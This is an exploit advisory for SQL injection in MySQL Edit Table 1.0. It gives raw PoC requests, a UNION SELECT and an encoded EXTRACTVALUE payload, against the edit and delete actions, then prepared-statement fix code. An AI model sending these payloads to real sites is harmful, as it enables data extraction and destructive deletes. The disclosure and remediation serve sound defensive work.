MySQL Edit Table 1.0 SQL Injection

Posted Oct 22, 2018
Authored by Ihsan Sencan

MySQL Edit Table version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 19c3b4630111dd4e32c4693e85b43bd9

# Exploit Title: MySQL Edit Table 1.0 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.bookman.nl
# Software Link: https://sourceforge.net/projects/sql-edit-table/files/latest/download
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/example.php?mte_a=edit&id=[SQL]
# function edit_rec() {
# if (isset ($_GET['id'])) $in_id = $_GET['id'];
# if ($_GET['mte_a'] == 'edit') $edit=1;
# else $edit = 0;
# $count_required = 0;
# $rows = '';
# $result = mysqli_query($this->mysqli,"SHOW COLUMNS FROM `$this->table`");

GET /[PATH]/example.php?mte_a=edit&id=-18++UNIon(SEleCT+0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e%2c0x496873616e2053656e63616e)--+- HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:31:03 GMT

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:34:58 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:34:58 GMT
Content-Length: 3642
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# POC:
# 2)
# http://localhost/[PATH]/example.php?mte_a=del&id=[SQL]
#
# function del_rec() {
# $in_id = $_GET['id'];
# if (mysqli_query($this->mysqli,"DELETE FROM $this->table WHERE `$this->primary_key` = '$in_id'")) {
# $this->content_deleted = "

GET /[PATH]/example.php?mte_a=del&id=%27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%31%31%31%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%31%31%3d%31%31%31%2c%31%29%29%29%29%29%2d%2d%20%45%66%65 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v2bqm10m5rlph8563tiflttl7
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 18 Oct 2018 14:38:14 GMT

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 14:38:18 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: private
Pragma: no-cache
Last-Modified: Thu, 18 Oct 2018 14:38:18 GMT
Content-Length: 1046
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
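
Both PoCs work because `$_GET['id']` is interpolated directly into the SQL text. The following is an added example, not code from the advisory or from MySQL Edit Table: the hypothetical helpers `mte_safe_identifier`, `mte_prepare_by_id`, `mte_delete_record` and `mte_fetch_record` show the bound-parameter form with mysqli. The SELECT in `mte_fetch_record` is an assumption, since the excerpt of `edit_rec()` does not show the query that uses `$in_id`.

```php
<?php
// Added example: hypothetical helpers, not MySQL Edit Table's own code.

// Identifiers cannot be bound as parameters, so allow-list their characters
// before wrapping them in backticks.
function mte_safe_identifier($name)
{
    if (!is_string($name) || !preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid SQL identifier');
    }
    return '`' . $name . '`';
}

// Builds "<prefix> FROM <table> WHERE <pk> = ? LIMIT 1" and binds the id as
// data, so quotes or SQL keywords in it are never parsed as SQL.
function mte_prepare_by_id(mysqli $db, $prefix, $table, $primaryKey, $id)
{
    if (!is_scalar($id)) {              // rejects array input such as id[]=1
        throw new InvalidArgumentException('id must be a scalar');
    }
    $sql = $prefix . ' FROM ' . mte_safe_identifier($table)
         . ' WHERE ' . mte_safe_identifier($primaryKey) . ' = ? LIMIT 1';
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed');
    }
    $id = (string) $id;
    $stmt->bind_param('s', $id);        // bind_param takes its values by reference
    if (!$stmt->execute()) {
        throw new RuntimeException('execute failed');
    }
    return $stmt;
}

// Counterpart of the DELETE shown in del_rec().
function mte_delete_record(mysqli $db, $table, $primaryKey, $id)
{
    $stmt = mte_prepare_by_id($db, 'DELETE', $table, $primaryKey, $id);
    $deleted = ($stmt->affected_rows === 1);
    $stmt->close();
    return $deleted;
}

// Assumed read path for edit_rec(); get_result() needs the mysqlnd driver.
function mte_fetch_record(mysqli $db, $table, $primaryKey, $id)
{
    $stmt = mte_prepare_by_id($db, 'SELECT *', $table, $primaryKey, $id);
    $result = $stmt->get_result();
    $row = $result ? $result->fetch_assoc() : null;
    $stmt->close();
    return $row;
}
```

With these helpers the request value is passed through unchanged, for example `mte_delete_record($mysqli, $table, $primary_key, $_GET['id'])`, and the payloads in both PoCs are compared against the key column as literal strings.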
